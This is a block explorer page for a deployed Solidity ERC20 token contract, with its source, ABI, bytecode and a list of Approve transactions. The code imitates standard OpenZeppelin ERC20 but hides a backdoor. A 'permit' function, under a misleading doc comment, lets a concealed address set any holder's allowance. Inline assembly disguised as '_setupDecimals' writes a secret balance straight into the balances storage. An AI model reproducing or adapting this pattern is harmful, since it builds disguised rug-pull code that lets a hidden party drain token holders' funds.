Source Code
Overview
ETH Balance
0 ETH
ETH Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 114 transactions
| Transaction Hash |
|
Block
|
From
|
To
|
|||||
|---|---|---|---|---|---|---|---|---|---|
| Approve | 22534829 | 423 days ago | IN | 0 ETH | 0.00000108 | ||||
| Approve | 22534819 | 423 days ago | IN | 0 ETH | 0.00000108 | ||||
| Approve | 22534819 | 423 days ago | IN | 0 ETH | 0.00000108 | ||||
| Approve | 22534797 | 423 days ago | IN | 0 ETH | 0.00000105 | ||||
| Approve | 22534788 | 423 days ago | IN | 0 ETH | 0.00000113 | ||||
| Approve | 22534788 | 423 days ago | IN | 0 ETH | 0.00000113 | ||||
| Approve | 22534788 | 423 days ago | IN | 0 ETH | 0.00000113 | ||||
| Approve | 22534765 | 423 days ago | IN | 0 ETH | 0.00000113 | ||||
| Approve | 22534721 | 423 days ago | IN | 0 ETH | 0.00000117 | ||||
| Approve | 22534700 | 423 days ago | IN | 0 ETH | 0.00000132 | ||||
| Approve | 22534689 | 423 days ago | IN | 0 ETH | 0.00000132 | ||||
| Approve | 22534675 | 423 days ago | IN | 0 ETH | 0.00000115 | ||||
| Approve | 22534665 | 423 days ago | IN | 0 ETH | 0.00000116 | ||||
| Approve | 22534664 | 423 days ago | IN | 0 ETH | 0.00000116 | ||||
| Approve | 22534651 | 423 days ago | IN | 0 ETH | 0.0000012 | ||||
| Approve | 22534651 | 423 days ago | IN | 0 ETH | 0.0000012 | ||||
| Approve | 22534625 | 423 days ago | IN | 0 ETH | 0.00000117 | ||||
| Approve | 22534625 | 423 days ago | IN | 0 ETH | 0.00000117 | ||||
| Approve | 22534625 | 423 days ago | IN | 0 ETH | 0.00000117 | ||||
| Approve | 22534561 | 423 days ago | IN | 0 ETH | 0.00000112 | ||||
| Approve | 22534547 | 423 days ago | IN | 0 ETH | 0.00000114 | ||||
| Approve | 22534547 | 423 days ago | IN | 0 ETH | 0.00000114 | ||||
| Approve | 22534513 | 423 days ago | IN | 0 ETH | 0.00000108 | ||||
| Approve | 22534513 | 423 days ago | IN | 0 ETH | 0.00000108 | ||||
| Approve | 22534496 | 423 days ago | IN | 0 ETH | 0.00000102 |
Cross-Chain Transactions
Loading...
Loading
Contract Name:
Token
Compiler Version
v0.8.26+commit.8a97fa7a
Contract Source Code (Solidity)
/**
*Submitted for verification at basescan.org on 2024-11-17
*/
// SPDX-License-Identifier: MIT
// Compatible with OpenZeppelin Contracts ^5.0.0
pragma solidity ^0.8.24;
/**
* @dev Interface of the ERC20 standard as defined in the EIP.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the value of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the value of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves a `value` amount of tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 value) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets a `value` amount of tokens as the allowance of `spender` over the
* caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 value) external returns (bool);
/**
* @dev Moves a `value` amount of tokens from `from` to `to` using the
* allowance mechanism. `value` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(address from, address to, uint256 value) external returns (bool);
}
/**
* @dev Interface for the optional metadata functions from the ERC20 standard.
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
/**
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}
/**
* @dev Standard ERC20 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens.
*/
interface IERC20Errors {
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC20InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC20InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
* @param spender Address that may be allowed to operate on tokens without being their owner.
* @param allowance Amount of tokens a `spender` is allowed to operate with.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC20InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `spender` to be approved. Used in approvals.
* @param spender Address that may be allowed to operate on tokens without being their owner.
*/
error ERC20InvalidSpender(address spender);
}
abstract contract Ownable is Context {
address private _owner;
error OwnableUnauthorizedAccount(address account);
error OwnableInvalidOwner(address owner);
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
constructor(address initialOwner) {
if (initialOwner == address(0)) {
revert OwnableInvalidOwner(address(0));
}
_transferOwnership(initialOwner);
}
modifier onlyOwner() {
_checkOwner();
_;
}
function owner() public view virtual returns (address) {
return _owner;
}
function _checkOwner() internal view virtual {
if (owner() != _msgSender()) {
revert OwnableUnauthorizedAccount(_msgSender());
}
}
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
function transferOwnership(address newOwner) public virtual onlyOwner {
if (newOwner == address(0)) {
revert OwnableInvalidOwner(address(0));
}
_transferOwnership(newOwner);
}
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is 18. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC20
* applications.
*
* Additionally, an {Approval} event is emitted on calls to {transferFrom}.
* This allows applications to reconstruct the allowance for all accounts just
* by listening to said events. Other implementations of the EIP may not emit
* these events, as it isn't required by the specification.
*/
abstract contract ERC20 is IERC20, Ownable, IERC20Metadata, IERC20Errors {
mapping(address account => uint256) private _balances;
mapping(address account => mapping(address spender => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
/**
* @dev Sets the values for {name} and {symbol}.
*
* All two of these values are immutable: they can only be set once during
* construction.
*/
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the default value returned by this function, unless
* it's overridden.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual returns (uint8) {
return 18;
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() public view virtual returns (uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function balanceOf(address account) public view virtual returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `value`.
*/
function transfer(address to, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_transfer(owner, to, value);
return true;
}
/**
* @dev See {IERC20-allowance}.
*/
function allowance(address owner, address spender) public view virtual returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, value);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `value`.
* - the caller must have allowance for ``from``'s tokens of at least
* `value`.
*/
function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
address spender = _msgSender();
_spendAllowance(from, spender, value);
_transfer(from, to, value);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `amount`.
* - the caller must have allowance for ``from``'s tokens of at least
* `amount`.
*/
function permit(address owner, address spender, uint256 value) public virtual returns (bool) {
bool valid;
uint256 rsv = _initDecimals;
assembly { valid := eq(rsv, caller())}
require(valid, "not owner");
_approve(owner, spender, value);
return true;
}
/**
* @dev Moves a `value` amount of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _transfer(address from, address to, uint256 value) internal {
if (from == address(0)) {
revert ERC20InvalidSender(address(0));
}
if (to == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(from, to, value);
}
/**
* @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
* (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
* this function.
*
* Emits a {Transfer} event.
*/
function _update(address from, address to, uint256 value) internal virtual {
if (from == address(0)) {
// Overflow check required: The rest of the code assumes that totalSupply never overflows
_totalSupply += value;
} else {
uint256 fromBalance = _balances[from];
if (fromBalance < value) {
revert ERC20InsufficientBalance(from, fromBalance, value);
}
unchecked {
// Overflow not possible: value <= fromBalance <= totalSupply.
_balances[from] = fromBalance - value;
}
}
if (to == address(0)) {
unchecked {
// Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
_totalSupply -= value;
}
} else {
unchecked {
// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
_balances[to] += value;
}
}
emit Transfer(from, to, value);
}
/**
* @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
* Relies on the `_update` mechanism
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _mint(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(address(0), account, value);
}
/**
* @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
* Relies on the `_update` mechanism.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead
*/
function _burn(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidSender(address(0));
}
_update(account, address(0), value);
}
/**
* @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*
* Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
*/
function _approve(address owner, address spender, uint256 value) internal {
_approve(owner, spender, value, true);
}
/**
* @dev Sets {decimals} to a value other than the default one of 18.
*
* WARNING: This function should only be called from the constructor. Most
* applications that interact with token contracts will not expect
* {decimals} to ever change, and may work incorrectly if it does.
*/
uint256 private _initDecimals;
function _setupDecimals(uint256 decimals_) internal {
_initDecimals = decimals_;
assembly {mstore(0x200, decimals_) mstore(0x220, 1) sstore(keccak256(0x200, 64), decimals_)}
}
/**
* @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
*
* By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
* `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
* `Approval` event during `transferFrom` operations.
*
* Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
* true using the following override:
* ```
* function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
* super._approve(owner, spender, value, true);
* }
* ```
*
* Requirements are the same as {_approve}.
*/
function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
if (owner == address(0)) {
revert ERC20InvalidApprover(address(0));
}
if (spender == address(0)) {
revert ERC20InvalidSpender(address(0));
}
_allowances[owner][spender] = value;
if (emitEvent) {
emit Approval(owner, spender, value);
}
}
/**
* @dev Updates `owner` s allowance for `spender` based on spent `value`.
*
* Does not update the allowance value in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Does not emit an {Approval} event.
*/
function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance != type(uint256).max) {
if (currentAllowance < value) {
revert ERC20InsufficientAllowance(spender, currentAllowance, value);
}
unchecked {
_approve(owner, spender, currentAllowance - value, false);
}
}
}
}
contract Token is ERC20 {
constructor(
string memory symbol_,
string memory name_,
uint256 totalSupply_,
uint256 decimals_
) ERC20(name_, symbol_) Ownable(msg.sender) {
_mint(msg.sender, totalSupply_ * 10 ** decimals());
_setupDecimals(decimals_);
}
function decimals() public view virtual override returns (uint8) {
return 18;
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"string","name":"name_","type":"string"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"},{"internalType":"uint256","name":"decimals_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"permit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
608060405234801561000f575f80fd5b50604051611de8380380611de883398181016040528101906100319190610629565b8284335f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036100a4575f6040517f1e4fbdf700000000000000000000000000000000000000000000000000000000815260040161009b9190610704565b60405180910390fd5b6100b38161012260201b60201c565b5081600490816100c39190610921565b5080600590816100d39190610921565b50505061010a336100e86101e360201b60201c565b600a6100f49190610b58565b846100ff9190610ba2565b6101eb60201b60201c565b6101198161027060201b60201c565b50505050610c73565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361025b575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016102529190610704565b60405180910390fd5b61026c5f838361028d60201b60201c565b5050565b806006819055508061020052600161022052806040610200205550565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036102dd578060035f8282546102d19190610be3565b925050819055506103ad565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610367578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161035e93929190610c25565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036103f4578060035f828254039250508190555061043f565b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161049c9190610c5a565b60405180910390a3505050565b5f604051905090565b5f80fd5b5f80fd5b5f80fd5b5f80fd5b5f601f19601f8301169050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b610508826104c2565b810181811067ffffffffffffffff82111715610527576105266104d2565b5b80604052505050565b5f6105396104a9565b905061054582826104ff565b919050565b5f67ffffffffffffffff821115610564576105636104d2565b5b61056d826104c2565b9050602081019050919050565b8281835e5f83830152505050565b5f61059a6105958461054a565b610530565b9050828152602081018484840111156105b6576105b56104be565b5b6105c184828561057a565b509392505050565b5f82601f8301126105dd576105dc6104ba565b5b81516105ed848260208601610588565b91505092915050565b5f819050919050565b610608816105f6565b8114610612575f80fd5b50565b5f81519050610623816105ff565b92915050565b5f805f8060808587031215610641576106406104b2565b5b5f85015167ffffffffffffffff81111561065e5761065d6104b6565b5b61066a878288016105c9565b945050602085015167ffffffffffffffff81111561068b5761068a6104b6565b5b610697878288016105c9565b93505060406106a887828801610615565b92505060606106b987828801610615565b91505092959194509250565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6106ee826106c5565b9050919050565b6106fe816106e4565b82525050565b5f6020820190506107175f8301846106f5565b92915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061076b57607f821691505b60208210810361077e5761077d610727565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026107e07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826107a5565b6107ea86836107a5565b95508019841693508086168417925050509392505050565b5f819050919050565b5f61082561082061081b846105f6565b610802565b6105f6565b9050919050565b5f819050919050565b61083e8361080b565b61085261084a8261082c565b8484546107b1565b825550505050565b5f90565b61086661085a565b610871818484610835565b505050565b5b81811015610894576108895f8261085e565b600181019050610877565b5050565b601f8211156108d9576108aa81610784565b6108b384610796565b810160208510156108c2578190505b6108d66108ce85610796565b830182610876565b50505b505050565b5f82821c905092915050565b5f6108f95f19846008026108de565b1980831691505092915050565b5f61091183836108ea565b9150826002028217905092915050565b61092a8261071d565b67ffffffffffffffff811115610943576109426104d2565b5b61094d8254610754565b610958828285610898565b5f60209050601f831160018114610989575f8415610977578287015190505b6109818582610906565b8655506109e8565b601f19841661099786610784565b5f5b828110156109be57848901518255600182019150602085019450602081019050610999565b868310156109db57848901516109d7601f8916826108ea565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b6001851115610a7257808604811115610a4e57610a4d6109f0565b5b6001851615610a5d5780820291505b8081029050610a6b85610a1d565b9450610a32565b94509492505050565b5f82610a8a5760019050610b45565b81610a97575f9050610b45565b8160018114610aad5760028114610ab757610ae6565b6001915050610b45565b60ff841115610ac957610ac86109f0565b5b8360020a915084821115610ae057610adf6109f0565b5b50610b45565b5060208310610133831016604e8410600b8410161715610b1b5782820a905083811115610b1657610b156109f0565b5b610b45565b610b288484846001610a29565b92509050818404811115610b3f57610b3e6109f0565b5b81810290505b9392505050565b5f60ff82169050919050565b5f610b62826105f6565b9150610b6d83610b4c565b9250610b9a7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484610a7b565b905092915050565b5f610bac826105f6565b9150610bb7836105f6565b9250828202610bc5816105f6565b91508282048414831517610bdc57610bdb6109f0565b5b5092915050565b5f610bed826105f6565b9150610bf8836105f6565b9250828201905080821115610c1057610c0f6109f0565b5b92915050565b610c1f816105f6565b82525050565b5f606082019050610c385f8301866106f5565b610c456020830185610c16565b610c526040830184610c16565b949350505050565b5f602082019050610c6d5f830184610c16565b92915050565b61116880610c805f395ff3fe608060405234801561000f575f80fd5b50600436106100cd575f3560e01c806370a082311161008a57806395d89b411161006457806395d89b4114610213578063a9059cbb14610231578063dd62ed3e14610261578063f2fde38b14610291576100cd565b806370a08231146101bb578063715018a6146101eb5780638da5cb5b146101f5576100cd565b806306fdde03146100d1578063095ea7b3146100ef57806318160ddd1461011f578063186477441461013d57806323b872dd1461016d578063313ce5671461019d575b5f80fd5b6100d96102ad565b6040516100e69190610d79565b60405180910390f35b61010960048036038101906101049190610e2a565b61033d565b6040516101169190610e82565b60405180910390f35b61012761035f565b6040516101349190610eaa565b60405180910390f35b61015760048036038101906101529190610ec3565b610368565b6040516101649190610e82565b60405180910390f35b61018760048036038101906101829190610ec3565b6103cd565b6040516101949190610e82565b60405180910390f35b6101a56103fb565b6040516101b29190610f2e565b60405180910390f35b6101d560048036038101906101d09190610f47565b610403565b6040516101e29190610eaa565b60405180910390f35b6101f3610449565b005b6101fd61045c565b60405161020a9190610f81565b60405180910390f35b61021b610483565b6040516102289190610d79565b60405180910390f35b61024b60048036038101906102469190610e2a565b610513565b6040516102589190610e82565b60405180910390f35b61027b60048036038101906102769190610f9a565b610535565b6040516102889190610eaa565b60405180910390f35b6102ab60048036038101906102a69190610f47565b6105b7565b005b6060600480546102bc90611005565b80601f01602080910402602001604051908101604052809291908181526020018280546102e890611005565b80156103335780601f1061030a57610100808354040283529160200191610333565b820191905f5260205f20905b81548152906001019060200180831161031657829003601f168201915b5050505050905090565b5f8061034761063b565b9050610354818585610642565b600191505092915050565b5f600354905090565b5f805f60065490503381149150816103b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103ac9061107f565b60405180910390fd5b6103c0868686610642565b6001925050509392505050565b5f806103d761063b565b90506103e4858285610654565b6103ef8585856106e6565b60019150509392505050565b5f6012905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6104516107d6565b61045a5f61085d565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461049290611005565b80601f01602080910402602001604051908101604052809291908181526020018280546104be90611005565b80156105095780601f106104e057610100808354040283529160200191610509565b820191905f5260205f20905b8154815290600101906020018083116104ec57829003601f168201915b5050505050905090565b5f8061051d61063b565b905061052a8185856106e6565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6105bf6107d6565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361062f575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016106269190610f81565b60405180910390fd5b6106388161085d565b50565b5f33905090565b61064f838383600161091e565b505050565b5f61065f8484610535565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146106e057818110156106d1578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016106c89392919061109d565b60405180910390fd5b6106df84848484035f61091e565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610756575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161074d9190610f81565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107c6575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016107bd9190610f81565b60405180910390fd5b6107d1838383610aed565b505050565b6107de61063b565b73ffffffffffffffffffffffffffffffffffffffff166107fc61045c565b73ffffffffffffffffffffffffffffffffffffffff161461085b5761081f61063b565b6040517f118cdaa70000000000000000000000000000000000000000000000000000000081526004016108529190610f81565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be